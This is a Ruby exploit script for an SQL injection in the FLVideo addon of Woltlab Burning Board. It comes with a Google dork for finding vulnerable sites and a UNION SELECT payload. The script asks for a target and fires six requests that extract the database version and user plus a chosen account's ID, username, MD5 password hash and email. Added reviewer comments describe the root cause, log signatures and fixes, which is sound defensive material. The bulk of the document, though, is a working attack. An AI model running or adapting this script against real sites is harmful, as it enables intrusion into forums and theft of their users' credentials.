# Exploit Title: Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php Exploit
# Google Dork: inurl:flvideo.php wbb (and more)
# Date: 04.09.2013
# Exploit Author: Easy Laster
# Vendor Homepage: http://www.flvideo.de/
# Version: FLVideo Addon for WBB © 2007 by Danny König
# Tested on: Windows8/Backtrack
#!/usr/bin/ruby
#secunet.cc
#19.02.2013
#Discovered and Vulnerability by Easy Laster
#flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*
#*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))
#null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/
#**/+userid=1--+
#
# --- Reviewer notes (defensive reading of this listing) ---------------------
# Root cause, as the payload implies: the `value` query parameter of
# flvideo.php (action=search, for=cat) reaches a SQL statement without
# escaping or type enforcement, so a UNION ALL SELECT appended to it is run
# by the database. The vulnerable PHP is not shown here; confirm the exact
# sink in the addon source.
# Impact shown by this script: six GET requests, each returning one value:
# version(), user(), then userid, username, password and email from the
# hard-coded table bb1_users for the userid entered at the prompt. The output
# label describes the password column as MD5.
# Detection: look in web-server/WAF logs for requests to flvideo.php with
# action=search whose `value` parameter contains `union`, `select`, `/**/`,
# `concat(0x7e,0x27` or a `--` terminator. No request headers are set below,
# so Net::HTTP's default User-Agent ("Ruby") is sent. `bb1_users` is
# hard-coded, so rules should not key on the table name alone; other
# installations may use a different prefix.
# Mitigation: enforce an integer/whitelisted type on `value` and use
# parameterized queries in flvideo.php, or remove the addon if it is
# unmaintained. If exploitation is suspected, treat the exposed hashes as
# compromised and force password resets.
# -----------------------------------------------------------------------------
print "
################################################################
#secunet.cc#
################################################################
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
#Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php #
#Exploit #
# Using Host+Path+id #
#www.demo.de + /wbb/ + or + / + 1#
# Easy Laster#
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
################################################################
"
require 'net/http'
# Separator line reused between prompts and around the results.
block = "################################################################"
# The three prompts below are read from stdin and concatenated into the
# request without validation or URL-encoding.
print ""+ block +""
print "\nEnter Target Name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter Script Path (/wbb/ or /)->"
path=gets.chomp
print ""+ block +""
print "\nEnter The ID From User (id)->"
userid=gets.chomp
print ""+ block +""
# Everything from here to `rescue` is one begin block: any exception
# (connection error, or `match` returning nil when the marker is missing
# from the response) falls through to the generic failure message.
begin
  # Each request uses the same query-string shape: the selected expression
  # is wrapped by concat() in the bytes 0x7e (~) and 0x27 (') so that the
  # regex below can locate it in the response body, and NULLs pad the rest
  # of the select list (presumably to match the column count of the
  # original query).
  # All requests go to port 80 over plain HTTP.

  # Request 1: version() of the database server.
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))"+
  "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  "**/+userid="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]

  # Request 2: user(), the account the application connects to the
  # database with.
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(user()%20as%20char))"+
  "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  "**/+userid="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nDatabase User-> "+(/'~'(.+)'~'/).match(resp.body)[1]

  # Request 3: the userid column of the selected bb1_users row.
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(userid%20as%20char))"+
  "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  "**/+userid="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nID Account-> "+(/'~'(.+)'~'/).match(resp.body)[1]

  # Request 4: the username column.
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(username%20as%20char))"+
  "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  "**/+userid="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]

  # Request 5: the password column (labelled MD5 in the output below).
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(password%20as%20char))"+
  "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  "**/+userid="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]

  # Request 6: the email column.
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(email%20as%20char))"+
  "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  "**/+userid="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  print "\n"
  print ""+ block +""
  print "\n"
  print "
################################################################
#Greetings #
################################################################
#mAdDiN, c0Re, illuministrator, WD40, peak, IRET, GabbaGandalf #
#DR.zydz, HANN!BAL, 6rbk9 , Manifest, doc, cr4ck, Prof.Dr. Ogen#
#ezah, enco, 4c!d And SecuNet.cc, 4004, dc3 crew, hackbase.cc#
################################################################
"
rescue
  # Bare rescue: the cause of the failure is discarded and only this
  # message is printed.
  print "\nExploit Failed"
end